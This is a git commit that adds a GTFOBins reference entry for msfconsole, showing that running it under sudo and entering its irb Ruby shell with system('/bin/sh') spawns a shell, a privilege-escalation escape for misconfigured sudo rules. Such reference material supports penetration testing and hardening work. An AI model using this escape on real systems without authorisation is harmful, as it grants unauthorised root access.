Add msfconsole

master
Andrea Cardaci 2022-12-16 14:48:10 +01:00 committed by GitHub
commit 9058ed555f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 0 deletions

14
_gtfobins/msfconsole.md Normal file
View File

@ -0,0 +1,14 @@
---
description: This allows to spawn a [`ruby`](/gtfobins/ruby/) interpreter.
functions:
shell:
- code: |
sudo msfconsole
msf6 > irb
>> system("/bin/sh")
sudo:
- code: |
sudo msfconsole
msf6 > irb
>> system("/bin/sh")
---